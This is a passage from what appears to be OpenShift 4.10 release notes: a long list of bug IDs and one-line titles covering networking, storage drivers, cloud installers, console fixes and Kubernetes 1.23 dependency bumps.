2034474 - Template's boot source is "Unknown source" before and after set enableCommonBootImageImport to true
2034477 - [OVN] Multiple EgressIP objects configured, EgressIPs weren't working properly
2034493 - Change cluster version operator log level
2034513 - [OVN] After update one EgressIP in EgressIP object, one internal IP lost from lr-policy-list
2034527 - IPI deployment fails 'timeout reached while inspecting the node' when provisioning network ipv6
2034528 - [IBM VPC] volumeBindingMode should be WaitForFirstConsumer
2034534 - Update ose-machine-api-provider-openstack images to be consistent with ART
2034537 - Update team
2034559 - KubeAPIErrorBudgetBurn firing outside recommended latency thresholds
2034563 - [Azure] create machine with wrong ephemeralStorageLocation value success
2034577 - Current OVN gateway mode should be reflected on node annotation as well
2034621 - context menu not popping up for application group
2034622 - Allow volume expansion by default in vsphere CSI storageclass 4.10
2034624 - Warn about unsupported CSI driver in vsphere operator
2034647 - missing volumes list in snapshot modal
2034648 - Rebase openshift-controller-manager to 1.23
2034650 - Rebase openshift/builder to 1.23
2034705 - vSphere: storage e2e tests logging configuration data
2034743 - EgressIP: assigning the same egress IP to a second EgressIP object after a ovnkube-master restart does not fail.
2034766 - Special Resource Operator(SRO) - no cert-manager pod created in dual stack environment
2034785 - ptpconfig with summary_interval cannot be applied
2034823 - RHEL9 should be starred in template list
2034838 - An external router can inject routes if no service is added
2034839 - Jenkins sync plugin does not synchronize ConfigMap having label role=jenkins-agent
2034879 - Lifecycle hook's name and owner shouldn't be allowed to be empty
2034881 - Cloud providers components should use K8s 1.23 dependencies
2034884 - ART cannot build the image because it tries to download controller-gen
2034889 - `oc adm prune deployments` does not work
2034898 - Regression in recently added Events feature
2034957 - update openshift-apiserver to kube 1.23.1
2035015 - ClusterLogForwarding CR remains stuck remediating forever
2035093 - openshift-cloud-network-config-controller never runs on Hypershift cluster
2035141 - [RFE] Show GPU/Host devices in template's details tab
2035146 - "kubevirt-plugin~PVC cannot be empty" shows on add-disk modal while adding existing PVC
2035167 - [cloud-network-config-controller] unable to deleted cloudprivateipconfig when deleting
2035199 - IPv6 support in mtu-migration-dispatcher.yaml
2035239 - e2e-metal-ipi-virtualmedia tests are permanently failing
2035250 - Peering with ebgp peer over multi-hops doesn't work
2035264 - [RFE] Provide a proper message for nonpriv user who not able to add PCI devices
2035315 - invalid test cases for AWS passthrough mode
2035318 - Upgrade management workflow needs to allow custom upgrade graph path for disconnected env
2035321 - Add Sprint 211 translations
2035326 - [ExternalCloudProvider] installation with additional network on workers fails
2035328 - Ccoctl does not ignore credentials request manifest marked for deletion
2035333 - Kuryr orphans ports on 504 errors from Neutron
2035348 - Fix two grammar issues in kubevirt-plugin.json strings
2035393 - oc set data --dry-run=server makes persistent changes to configmaps and secrets
2035409 - OLM E2E test depends on operator package that's no longer published
2035439 - SDN Automatic assignment EgressIP on GCP returned node IP adress not egressIP address
2035453 - [IPI on Alibabacloud] 2 worker machines stuck in Failed phase due to connection to 'ecs-cn-hangzhou.aliyuncs.com' timeout, although the specified region is 'us-east-1'
2035454 - [IPI on Alibabacloud] the OSS bucket created during installation for image registry is not deleted after destroying the cluster
2035467 - UI: Queried metrics can't be ordered on Oberve->Metrics page
2035494 - [SDN Migration]ovnkube-node pods CrashLoopBackOff after sdn migrated to ovn for RHEL workers
2035515 - [IBMCLOUD] allowVolumeExpansion should be true in storage class
2035602 - [e2e][automation] add tests for Virtualization Overview page cards
2035703 - Roles -> RoleBindings tab doesn't show RoleBindings correctly
2035704 - RoleBindings list page filter doesn't apply
2035705 - Azure 'Destroy cluster' get stuck when the cluster resource group is already not existing.
2035757 - [IPI on Alibabacloud] one master node turned NotReady which leads to installation failed
2035772 - AccessMode and VolumeMode is not reserved for customize wizard
2035847 - Two dashes in the Cronjob / Job pod name
2035859 - the output of opm render doesn't contain olm.constraint which is defined in dependencies.yaml
2035882 - [BIOS setting values] Create events for all invalid settings in spec
2035903 - One redundant capi-operator credential requests in "oc adm extract --credentials-requests"
2035910 - [UI] Manual approval options are missing after ODF 4.10 installation starts when Manual Update approval is chosen
2035927 - Cannot enable HighNodeUtilization scheduler profile
2035933 - volume mode and access mode are empty in customize wizard review tab
2035969 - "ip a " shows "Error: Peer netns reference is invalid" after create test pods
2035986 - Some pods under kube-scheduler/kube-controller-manager are using the deprecated annotation
2036006 - [BIOS setting values] Attempt to set Integer parameter results in preparation error
2036029 - New added cloud-network-config operator doesn't supported aws sts format credential
2036096 - [azure-file-csi-driver] there are no e2e tests for NFS backend
2036113 - cluster scaling new nodes ovs-configuration fails on all new nodes
2036567 - [csi-driver-nfs] Upstream merge: Bump k8s libraries to 1.23
2036569 - [cloud-provider-openstack] Upstream merge: Bump k8s libraries to 1.23
2036577 - OCP 4.10 nightly builds from 4.10.0-0.nightly-s390x-2021-12-18-034912 to 4.10.0-0.nightly-s390x-2022-01-11-233015 fail to upgrade from OCP 4.9.11 and 4.9.12 for network type OVNKubernetes for zVM hypervisor environments
2036622 - sdn-controller crashes when restarted while a previous egress IP assignment exists
2036717 - Valid AlertmanagerConfig custom resource with valid a mute time interval definition is rejected
2036826 - `oc adm prune deployments` can prune the RC/RS
2036827 - The ccoctl still accepts CredentialsRequests without ServiceAccounts on GCP platform
2036861 - kube-apiserver is degraded while enable multitenant
2036937 - Command line tools page shows wrong download ODO link
2036940 - oc registry login fails if the file is empty or stdout
2036951 - [cluster-csi-snapshot-controller-operator] proxy settings is being injected in container
2036989 - Route URL copy to clipboard button wraps to a separate line by itself
2036990 - ZTP "DU Done inform policy" never becomes compliant on multi-node clusters
2036993 - Machine API components should use Go lang version 1.17
2037036 - The tuned profile goes into degraded status and ksm.service is displayed in the log.
2037061 - aws and gcp CredentialsRequest manifests missing ServiceAccountNames list for cluster-api
2037073 - Alertmanager container fails to start because of startup probe never being successful
2037075 - Builds do not support CSI volumes
2037167 - Some log level in ibm-vpc-block-csi-controller are hard code
2037168 - IBM-specific Deployment manifest for package-server-manager should be excluded on non-IBM cluster-profiles
2037182 - PingSource badge color is not matched with knativeEventing color
2037203 - "Running VMs" card is too small in Virtualization Overview
2037209 - [IPI on Alibabacloud] worker nodes are put in the default resource group unexpectedly
2037237 - Add "This is a CD-ROM boot source" to customize wizard
2037241 - default TTL for noobaa cache buckets should be 0
2037246 - Cannot customize auto-update boot source
2037276 - [IBMCLOUD] vpc-node-label-updater may fail to label nodes appropriately
2037288 - Remove stale image reference
2037331 - Ensure the ccoctl behaviors are similar between aws and gcp on the existing resources
2037483 - Rbacs for Pods within the CBO should be more restrictive
2037484 - Bump dependencies to k8s 1.23
2037554 - Mismatched wave number error message should include the wave numbers that are in conflict
2037622 - [4.10-Alibaba CSI driver][Restore size for volumesnapshot/volumesnapshotcontent is showing as 0 in Snapshot feature for Alibaba platform]
2037635 - impossible to configure custom certs for default console route in ingress config
2037637 - configure custom certificate for default console route doesn't take effect for OCP >= 4.8
2037638 - Builds do not support CSI volumes as volume sources
2037664 - text formatting issue in Installed Operators list table
2037680 - [IPI on Alibabacloud] sometimes operator 'cloud-controller-manager' tells empty VERSION, due to conflicts on listening tcp :8080
2037689 - [IPI on Alibabacloud] sometimes operator 'cloud-controller-manager' tells empty VERSION, due to conflicts on listening tcp :8080
2037801 - Serverless installation is failing on CI jobs for e2e tests
2037813 - Metal Day 1 Networking - networkConfig Field Only Accepts String Format
2037856 - use lease for leader election
2037891 - 403 Forbidden error shows for all the graphs in each grafana dashboard after upgrade from 4.9 to 4.10
2037903 - Alibaba Cloud: delete-ram-user requires the credentials-requests
2037904 - upgrade operator deployment failed due to memory limit too low for manager container
2038021 - [4.10-Alibaba CSI driver][Default volumesnapshot class is not added/present after successful cluster installation]
2038034 - non-privileged user cannot see auto-update boot source
2038053 - Bump dependencies to k8s 1.23
2038088 - Remove ipa-downloader references
2038160 - The `default` project missed the annotation : openshift.io/node-selector: ""
2038166 - Starting from Go 1.17 invalid certificates will render a cluster non-functional
2038196 - must-gather is missing collecting some metal3 resources
2038240 - Error when configuring a file using permissions bigger than decimal 511 (octal 0777)
2038253 - Validator Policies are long lived
2038272 - Failures to build a PreprovisioningImage are not reported
2038384 - Azure Default Instance Types are Incorrect
2038389 - Failing test: [sig-arch] events should not repeat pathologically
2038412 - Import page calls the git file list unnecessarily twice from GitHub/GitLab/Bitbucket
2038465 - Upgrade chromedriver to 90.x to support Mac M1 chips
2038481 - kube-controller-manager-guard and openshift-kube-scheduler-guard pods being deleted and restarted on a cordoned node when drained
2038596 - Auto egressIP for OVN cluster on GCP: After egressIP object is deleted, egressIP still takes effect
2038663 - update kubevirt-plugin OWNERS
2038691 - [AUTH-8] Panic on user login when the user belongs to a group in the IdP side and the group already exists via "oc adm groups new"
2038705 - Update ptp reviewers
2038761 - Open Observe->Targets page, wait for a while, page become blank
2038768 - All the filters on the Observe->Targets page can't work
2038772 - Some monitors failed to display on Observe->Targets page
2038793 - [SDN EgressIP] After reboot egress node, the egressip was lost from egress node
2038827 - should add user containers in /etc/subuid and /etc/subgid to support run pods in user namespaces
2038832 - New templates for centos stream8 are missing registry suggestions in create vm wizard
2038840 - [SDN EgressIP]cloud-network-config-controller pod was CrashLoopBackOff after some operation
2038864 - E2E tests fail because multi-hop-net was not created
2038879 - All Builds are getting listed in DeploymentConfig under workloads on OpenShift Console
2038934 - CSI driver operators should use the trusted CA bundle when cluster proxy is configured
2038968 - Move feature gates from a carry patch to openshift/api
2039056 - Layout issue with breadcrumbs on API explorer page
2039057 - Kind column is not wide enough in API explorer page
2039064 - Bulk Import e2e test flaking at a high rate
2039065 - Diagnose and fix Bulk Import e2e test that was previously disabled
2039085 - Cloud credential operator configuration failing to apply in hypershift/ROKS clusters
2039099 - [OVN EgressIP GCP] After reboot egress node, egressip that was previously assigned got lost
2039109 - [FJ OCP4.10 Bug]: startironic.sh failed to pull the image of image-customization container when behind a proxy
2039119 - CVO hotloops on Service openshift-monitoring/cluster-monitoring-operator
2039170 - [upgrade]Error shown on registry operator "missing the cloud-provider-config configmap" after upgrade
2039227 - Improve image customization server parameter passing during installation
2039241 - Improve image customization server parameter passing during installation
2039244 - Helm Release revision history page crashes the UI
2039294 - SDN controller metrics cannot be consumed correctly by prometheus
2039311 - oc Does Not Describe Build CSI Volumes
2039315 - Helm release list page should only fetch secrets for deployed charts
2039321 - SDN controller metrics are not being consumed by prometheus
2039330 - Create NMState button doesn't work in OperatorHub web console
2039339 - cluster-ingress-operator should report Unupgradeable if user has modified the aws resources annotations
2039345 - CNO does not verify the minimum MTU value for IPv6/dual-stack clusters.
2039359 - `oc adm prune deployments` can't prune the RS where the associated Deployment no longer exists
2039382 - gather_metallb_logs does not have execution permission
2039406 - logout from rest session after vsphere operator sync is finished
2039408 - Add GCP region northamerica-northeast2 to allowed regions
2039414 - Cannot see the weights increased for NodeAffinity, InterPodAffinity, TaintandToleration
2039425 - No need to set KlusterletAddonConfig CR applicationManager->enabled: true in RAN ztp deployment
2039491 - oc - git:// protocol used in unit tests
2039516 - Bump OVN to ovn21.12-21.12.0-25
2039529 - Project Dashboard Resource Quotas Card empty state test flaking at a high rate
2039534 - Diagnose and fix Project Dashboard Resource Quotas Card test that was previously disabled
2039541 - Resolv-prepender script duplicating entries
2039586 - [e2e] update centos8 to centos stream8
2039618 - VM created from SAP HANA template leads to 404 page if leave one network parameter empty
2039619 - [AWS] In tree provisioner storageclass aws disk type should contain 'gp3' and csi provisioner storageclass default aws disk type should be 'gp3'
2039670 - Create PDBs for control plane components
2039678 - Page goes blank when create image pull secret
2039689 - [IPI on Alibabacloud] Pay-by-specification NAT is no longer supported
2039743 - React missing key warning when open operator hub detail page (and maybe others as well)
2039756 - React missing key warning when open KnativeServing details
2039770 - Observe dashboard doesn't react on time-range changes after browser reload when perspective is changed in another tab
2039776 - Observe dashboard shows nothing if the URL links to an non existing dashboard
2039781 - [GSS] OBC is not visible by admin of a Project on Console
2039798 - Contextual binding with Operator backed service creates visual connector instead of Service binding connector
2039868 - Insights Advisor widget is not in the disabled state when the Insights Operator is disabled
2039880 - Log level too low for control plane metrics
2039919 - Add E2E test for router compression feature
2039981 - ZTP for standard clusters installs stalld on master nodes
2040132 - Flag --port has been deprecated, This flag has no effect now and will be removed in v1.24. You can use --secure-port instead
2040136 - external-dns-operator pod keeps restarting and reports error: timed out waiting for cache to be synced
2040143 - [IPI on Alibabacloud] suggest to remove region "cn-nanjing" or provide better error message
2040150 - Update ConfigMap keys for IBM HPCS
2040160 - [IPI on Alibabacloud] installation fails when region does not support pay-by-bandwidth
2040285 - Bump build-machinery-go for console-operator to pickup change in yaml-patch repository
2040357 - bump OVN to ovn-2021-21.12.0-11.el8fdp
2040376 - "unknown instance type" error for supported m6i.xlarge instance
2040394 - Controller: enqueue the failed configmap till services update
2040467 - Cannot build ztp-site-generator container image
2040504 - Change AWS EBS GP3 IOPS in MachineSet doesn't take affect in OpenShift 4
2040521 - RouterCertsDegraded certificate could not validate route hostname v4-0-config-system-custom-router-certs.apps
2040535 - Auto-update boot source is not available in customize wizard
2040540 - ovs hardware offload: ovsargs format error when adding vf netdev name
2040603 - rhel worker scaleup playbook failed because missing some dependency of podman
2040616 - rolebindings page doesn't load for normal users
2040620 - [MAPO] Error pulling MAPO image on installation
2040653 - Topology sidebar warns that another component is updated while rendering
2040655 - User settings update fails when selecting application in topology sidebar
2040661 - Different react warnings about updating state on unmounted components when leaving topology
2040670 - Permafailing CI job: periodic-ci-openshift-release-master-nightly-4.10-e2e-gcp-libvirt-cert-rotation
2040671 - [Feature:IPv6DualStack] most tests are failing in dualstack ipi
2040694 - Three upstream HTTPClientConfig struct fields missing in the operator
2040705 - Du policy for standard cluster runs the PTP daemon on masters and workers
2040710 - cluster-baremetal-operator cannot update BMC subscription CR
2040741 - Add CI test(s) to ensure that metal3 components are deployed in vSphere, OpenStack and None platforms
2040782 - Import YAML page blocks input with more then one generateName attribute
2040783 - The Import from YAML summary page doesn't show the resource name if created via generateName attribute
2040791 - Default PGT policies must be 'inform' to integrate with the Lifecycle Operator
2040793 - Fix snapshot e2e failures
2040880 - do not block upgrades if we can't connect to vcenter
2041087 - MetalLB: MetalLB CR is not upgraded automatically from 4.9 to 4.10
2041093 - autounattend.xml missing
2041204 - link to templates in virtualization-cluster-overview inventory card is to all templates
2041319 - [IPI on Alibabacloud] installation in region "cn-shanghai" failed, due to "Resource alicloud_vswitch CreateVSwitch Failed...InvalidCidrBlock.Overlapped"
2041326 - Should bump cluster-kube-descheduler-operator to kubernetes version V1.23
2041329 - aws and gcp CredentialsRequest manifests missing ServiceAccountNames list for cloud-network-config-controller
2041361 - [IPI on Alibabacloud] Disable session persistence and removebBandwidth peak of listener
2041441 - Provision volume with size 3000Gi even if sizeRange: '[10-2000]GiB' in storageclass on IBM cloud
2041466 - Kubedescheduler version is missing from the operator logs
2041475 - React components should have a (mostly) unique name in react dev tools to simplify code analyses
2041483 - MetallB: quay.io/openshift/origin-kube-rbac-proxy:4.10 deploy Metallb CR is missing (controller and speaker pods)
2041492 - Spacing between resources in inventory card is too small
2041509 - GCP Cloud provider components should use K8s 1.23 dependencies
2041510 - cluster-baremetal-operator doesn't run baremetal-operator's subscription webhook
2041541 - audit: ManagedFields are dropped using API not annotation
2041546 - ovnkube: set election timer at RAFT cluster creation time
2041554 - use lease for leader election
2041581 - KubeDescheduler operator log shows "Use of insecure cipher detected"
2041583 - etcd and api server cpu mask interferes with a guaranteed workload
2041598 - Including CA bundle in Azure Stack cloud config causes MCO failure
2041605 - Dynamic Plugins: discrepancy in proxy alias documentation/implementation
2041620 - bundle CSV alm-examples does not parse
2041641 - Fix inotify leak and kubelet retaining memory
2041671 - Delete templates leads to 404 page
2041694 - [IPI on Alibabacloud] installation fails when region does not support the cloud_essd disk category
2041734 - ovs hwol: VFs are unbind when switchdev mode is enabled
2041750 - [IPI on Alibabacloud] trying "create install-config" with region "cn-wulanchabu (China (Ulanqab))" (or "ap-southeast-6 (Philippines (Manila))", "cn-guangzhou (China (Guangzhou))") failed due to invalid endpoint
2041763 - The Observe > Alerting pages no longer have their default sort order applied
2041830 - CI: ovn-kubernetes-master-e2e-aws-ovn-windows is broken
2041854 - Communities / Local prefs are applied to all the services regardless of the pool, and only one community is applied
2041882 - cloud-network-config operator can't work normal on GCP workload identity cluster
2041888 - Intermittent incorrect build to run correlation, leading to run status updates applied to wrong build, builds stuck in non-terminal phases
2041926 - [IPI on Alibabacloud] Installer ignores public zone when it does not exist
2041971 - [vsphere] Reconciliation of mutating webhooks didn't happen
2041989 - CredentialsRequest manifests being installed for ibm-cloud-managed profile
2041999 - [PROXY] external dns pod cannot recognize custom proxy CA
2042001 - unexpectedly found multiple load balancers
2042029 - kubedescheduler fails to install completely
2042036 - [IBMCLOUD] "openshift-install explain installconfig.platform.ibmcloud" contains not yet supported custom vpc parameters
2042049 - Seeing warning related to unrecognized feature gate in kubescheduler & KCM logs
2042059 - update discovery burst to reflect lots of CRDs on openshift clusters
2042069 - Revert toolbox to rhcos-toolbox
2042169 - Can not delete egressnetworkpolicy in Foreground propagation
2042181 - MetalLB: User should not be allowed add same bgp advertisement twice in BGP address pool
2042265 - [IBM]"--scale-down-utilization-threshold" doesn't work on IBMCloud
2042274 - Storage API should be used when creating a PVC
2042315 - Baremetal IPI deployment with IPv6 control plane and disabled provisioning network fails as the nodes do not pass introspection
2042366 - Lifecycle hooks should be independently managed
2042370 - [IPI on Alibabacloud] installer panics when the zone does not have an enhanced NAT gateway
2042382 - [e2e][automation] CI takes more then 2 hours to run
2042395 - Add prerequisites for active health checks test
2042438 - Missing rpms in openstack-installer image
2042466 - Selection does not happen when switching from Topology Graph to List View
2042493 - No way to verify if IPs with leading zeros are still valid in the apiserver
2042567 - insufficient info on CodeReady Containers configuration
2042600 - Alone, the io.kubernetes.cri-o.Devices option poses a security risk
2042619 - Overview page of the console is broken for hypershift clusters
2042655 - [IPI on Alibabacloud] cluster becomes unusable if there is only one kube-apiserver pod running
2042711 - [IBMCloud] Machine Deletion Hook cannot work on IBMCloud
2042715 - [AliCloud] Machine Deletion Hook cannot work on AliCloud
2042770 - [IPI on Alibabacloud] with vpcID & vswitchIDs specified, the installer would still try creating NAT gateway unexpectedly
2042829 - Topology performance: HPA was fetched for each Deployment (Pod Ring)
2042851 - Create template from SAP HANA template flow - VM is created instead of a new template
2042906 - Edit machineset with same machine deletion hook name succeed
2042960 - azure-file CI fails with "gid(0) in storageClass and pod fsgroup(1000) are not equal"
2043003 - [IPI on Alibabacloud] 'destroy cluster' of a failed installation (bug2041694) stuck after 'stage=Nat gateways'
2043042 - [Serial] [sig-auth][Feature:OAuthServer] [RequestHeaders] [IdP] test RequestHeaders IdP [Suite:openshift/conformance/serial]
2043043 - Cluster Autoscaler should use K8s 1.23 dependencies
2043064 - Topology performance: Unnecessary rerenderings in topology nodes (unchanged mobx props)
2043078 - Favorite system projects not visible in the project selector after toggling "Show default projects".
2043117 - Recommended operators links are erroneously treated as external
2043130 - Update CSI sidecars to the latest release for 4.10
2043234 - Missing validation when creating several BGPPeers with the same peerAddress
2043240 - Sync openshift/descheduler with sigs.k8s.io/descheduler
2043254 - crio does not bind the security profiles directory
2043296 - Ignition fails when reusing existing statically-keyed LUKS volume
2043297 - [4.10] Bootimage bump tracker
2043316 - RHCOS VM fails to boot on Nutanix AOS
2043446 - Rebase aws-efs-utils to the latest upstream version.
2043556 - Add proper ci-operator configuration to ironic and ironic-agent images
2043577 - DPU network operator
2043651 - Fix bug with exp. backoff working correcly when setting nextCheck in vsphere operator
2043675 - Too many machines deleted by cluster autoscaler when scaling down
2043683 - Revert bug 2039344 Ignoring IPv6 addresses against etcd cert validation
2043709 - Logging flags no longer being bound to command line
2043721 - Installer bootstrap hosts using outdated kubelet containing bugs
2043731 - [IBMCloud] terraform outputs missing for ibmcloud bootstrap and worker ips for must-gather
2043759 - Bump cluster-ingress-operator to k8s.io/api 1.23
2043780 - Bump router to k8s.io/api 1.23
2043787 - Bump cluster-dns-operator to k8s.io/api 1.23
2043801 - Bump CoreDNS to k8s.io/api 1.23
2043802 - EgressIP stopped working after single egressIP for a netnamespace is switched to the other node of HA pair after the first egress node is shutdown
2043961 - [OVN-K] If pod creation fails, retry doesn't work as expected.
2044201 - Templates golden image parameters names should be supported
2044244 - Builds are failing after upgrading the cluster with builder image [jboss-webserver-5/jws56-openjdk8-openshift-rhel8]
2044248 - [IBMCloud][vpc.block.csi.ibm.io]Cluster common user use the storageclass without parameter "csi.storage.k8s.io/fstype" create pvc,pod successfully but write data to the pod's volume failed of "Permission denied"
2044303 - [ovn][cloud-network-config-controller] cloudprivateipconfigs ips were left after deleting egressip objects
2044347 - Bump to kubernetes 1.23.3
2044481 - collect sharedresource cluster scoped instances with must-gather
2044496 - Unable to create hardware events subscription - failed to add finalizers
2044628 - CVE-2022-21673 grafana: Forward OAuth Identity Token can allow users to access some data sources
2044680 - Additional libovsdb performance and resource consumption fixes
2044704 - Observe > Alerting pages should not show runbook links in 4.10
2044717 - [e2e] improve tests for upstream test environment
2044724 - 
Remove namespace column on VM list page when a project is selected\n2044745 - Upgrading cluster from 4.9 to 4.10 on Azure (ARO) causes the cloud-network-config-controller pod to CrashLoopBackOff\n2044808 - machine-config-daemon-pull.service: use `cp` instead of `cat` when extracting MCD in OKD\n2045024 - CustomNoUpgrade alerts should be ignored\n2045112 - vsphere-problem-detector has missing rbac rules for leases\n2045199 - SnapShot with Disk Hot-plug hangs\n2045561 - Cluster Autoscaler should use the same default Group value as Cluster API\n2045591 - Reconciliation of aws pod identity mutating webhook did not happen\n2045849 - Add Sprint 212 translations\n2045866 - MCO Operator pod spam \"Error creating event\" warning messages in 4.10\n2045878 - Sync upstream 1.16.0 downstream; includes hybrid helm plugin\n2045916 - [IBMCloud] Default machine profile in installer is unreliable\n2045927 - [FJ OCP4.10 Bug]: Podman failed to pull the IPA image due to the loss of proxy environment\n2046025 - [IPI on Alibabacloud] pre-configured alicloud DNS private zone is deleted after destroying cluster, please clarify\n2046137 - oc output for unknown commands is not human readable\n2046296 - When creating multiple consecutive egressIPs on GCP not all of them get assigned to the instance\n2046297 - Bump DB reconnect timeout\n2046517 - In Notification drawer, the \"Recommendations\" header shows when there isn\u0027t any recommendations\n2046597 - Observe \u003e Targets page may show the wrong service monitor is multiple monitors have the same namespace \u0026 label selectors\n2046626 - Allow setting custom metrics for Ansible-based Operators\n2046683 - [AliCloud]\"--scale-down-utilization-threshold\" doesn\u0027t work on AliCloud\n2047025 - Installation fails because of Alibaba CSI driver operator is degraded\n2047190 - Bump Alibaba CSI driver for 4.10\n2047238 - When using communities and localpreferences together, only localpreference gets applied\n2047255 - alibaba: 
resourceGroupID not found\n2047258 - [aws-usgov] fatal error occurred if AMI is not provided for AWS GovCloud regions\n2047317 - Update HELM OWNERS files under Dev Console\n2047455 - [IBM Cloud] Update custom image os type\n2047496 - Add image digest feature\n2047779 - do not degrade cluster if storagepolicy creation fails\n2047927 - \u0027oc get project\u0027 caused \u0027Observed a panic: cannot deep copy core.NamespacePhase\u0027 when AllRequestBodies is used\n2047929 - use lease for leader election\n2047975 - [sig-network][Feature:Router] The HAProxy router should override the route host for overridden domains with a custom value [Skipped:Disconnected] [Suite:openshift/conformance/parallel]\n2048046 - New route annotation to show another URL or hide topology URL decorator doesn\u0027t work for Knative Services\n2048048 - Application tab in User Preferences dropdown menus are too wide. \n2048050 - Topology list view items are not highlighted on keyboard navigation\n2048117 - [IBM]Shouldn\u0027t change status.storage.bucket and status.storage.resourceKeyCRN when update sepc.stroage,ibmcos with invalid value\n2048413 - Bond CNI: Failed to attach Bond NAD to pod\n2048443 - Image registry operator panics when finalizes config deletion\n2048478 - [alicloud] CCM deploys alibaba-cloud-controller-manager from quay.io/openshift/origin-*\n2048484 - SNO: cluster-policy-controller failed to start due to missing serving-cert/tls.crt\n2048598 - Web terminal view is broken\n2048836 - ovs-configure mis-detecting the ipv6 status on IPv4 only cluster causing Deployment failure\n2048891 - Topology page is crashed\n2049003 - 4.10: [IBMCloud] ibm-vpc-block-csi-node does not specify an update strategy, only resource requests, or priority class\n2049043 - Cannot create VM from template\n2049156 - \u0027oc get project\u0027 caused \u0027Observed a panic: cannot deep copy core.NamespacePhase\u0027 when AllRequestBodies is used\n2049886 - Placeholder bug for OCP 4.10.0 metadata 
release\n2049890 - Warning annotation for pods with cpu requests or limits on single-node OpenShift cluster without workload partitioning\n2050189 - [aws-efs-csi-driver] Merge upstream changes since v1.3.2\n2050190 - [aws-ebs-csi-driver] Merge upstream changes since v1.2.0\n2050227 - Installation on PSI fails with: \u0027openstack platform does not have the required standard-attr-tag network extension\u0027\n2050247 - Failing test in periodics: [sig-network] Services should respect internalTrafficPolicy=Local Pod and Node, to Pod (hostNetwork: true) [Feature:ServiceInternalTrafficPolicy] [Skipped:Network/OVNKubernetes] [Suite:openshift/conformance/parallel] [Suite:k8s]\n2050250 - Install fails to bootstrap, complaining about DefragControllerDegraded and sad members\n2050310 - ContainerCreateError when trying to launch large (\u003e500) numbers of pods across nodes\n2050370 - alert data for burn budget needs to be updated to prevent regression\n2050393 - ZTP missing support for local image registry and custom machine config\n2050557 - Can not push images to image-registry when enabling KMS encryption in AlibabaCloud\n2050737 - Remove metrics and events for master port offsets\n2050801 - Vsphere upi tries to access vsphere during manifests generation phase\n2050883 - Logger object in LSO does not log source location accurately\n2051692 - co/image-registry is degrade because ImagePrunerDegraded: Job has reached the specified backoff limit\n2052062 - Whereabouts should implement client-go 1.22+\n2052125 - [4.10] Crio appears to be coredumping in some scenarios\n2052210 - [aws-c2s] kube-apiserver crashloops due to missing cloud config\n2052339 - Failing webhooks will block an upgrade to 4.10 mid-way through the upgrade. 
\n2052458 - [IBM Cloud] ibm-vpc-block-csi-controller does not specify an update strategy, priority class, or only resource requests\n2052598 - kube-scheduler should use configmap lease\n2052599 - kube-controller-manger should use configmap lease\n2052600 - Failed to scaleup RHEL machine against OVN cluster due to jq tool is required by configure-ovs.sh\n2052609 - [vSphere CSI driver Operator] RWX volumes counts metrics `vsphere_rwx_volumes_total` not valid\n2052611 - MetalLB: BGPPeer object does not have ability to set ebgpMultiHop\n2052612 - MetalLB: Webhook Validation: Two BGPPeers instances can have different router ID set. \n2052644 - Infinite OAuth redirect loop post-upgrade to 4.10.0-rc.1\n2052666 - [4.10.z] change gitmodules to rhcos-4.10 branch\n2052756 - [4.10] PVs are not being cleaned up after PVC deletion\n2053175 - oc adm catalog mirror throws \u0027missing signature key\u0027 error when using file://local/index\n2053218 - ImagePull fails with error \"unable to pull manifest from example.com/busy.box:v5 invalid reference format\"\n2053252 - Sidepanel for Connectors/workloads in topology shows invalid tabs\n2053268 - inability to detect static lifecycle failure\n2053314 - requestheader IDP test doesn\u0027t wait for cleanup, causing high failure rates\n2053323 - OpenShift-Ansible BYOH Unit Tests are Broken\n2053339 - Remove dev preview badge from IBM FlashSystem deployment windows\n2053751 - ztp-site-generate container is missing convenience entrypoint\n2053945 - [4.10] Failed to apply sriov policy on intel nics\n2054109 - Missing \"app\" label\n2054154 - RoleBinding in project without subject is causing \"Project access\" page to fail\n2054244 - Latest pipeline run should be listed on the top of the pipeline run list\n2054288 - console-master-e2e-gcp-console is broken\n2054562 - DPU network operator 4.10 branch need to sync with master\n2054897 - Unable to deploy hw-event-proxy operator\n2055193 - e2e-metal-ipi-serial-ovn-ipv6 is failing 
frequently\n2055358 - Summary Interval Hardcoded in PTP Operator if Set in the Global Body Instead of Command Line\n2055371 - Remove Check which enforces summary_interval must match logSyncInterval\n2055689 - [ibm]Operator storage PROGRESSING and DEGRADED is true during fresh install for ocp4.11\n2055894 - CCO mint mode will not work for Azure after sunsetting of Active Directory Graph API\n2056441 - AWS EFS CSI driver should use the trusted CA bundle when cluster proxy is configured\n2056479 - ovirt-csi-driver-node pods are crashing intermittently\n2056572 - reconcilePrecaching error: cannot list resource \"clusterserviceversions\" in API group \"operators.coreos.com\" at the cluster scope\"\n2056629 - [4.10] EFS CSI driver can\u0027t unmount volumes with \"wait: no child processes\"\n2056878 - (dummy bug) ovn-kubernetes ExternalTrafficPolicy still SNATs\n2056928 - Ingresscontroller LB scope change behaviour differs for different values of aws-load-balancer-internal annotation\n2056948 - post 1.23 rebase: regression in service-load balancer reliability\n2057438 - Service Level Agreement (SLA) always show \u0027Unknown\u0027\n2057721 - Fix Proxy support in RHACM 2.4.2\n2057724 - Image creation fails when NMstateConfig CR is empty\n2058641 - [4.10] Pod density test causing problems when using kube-burner\n2059761 - 4.9.23-s390x-machine-os-content manifest invalid when mirroring content for disconnected install\n2060610 - Broken access to public images: Unable to connect to the server: no basic auth credentials\n2060956 - service domain can\u0027t be resolved when networkpolicy is used in OCP 4.10-rc\n\n5. 
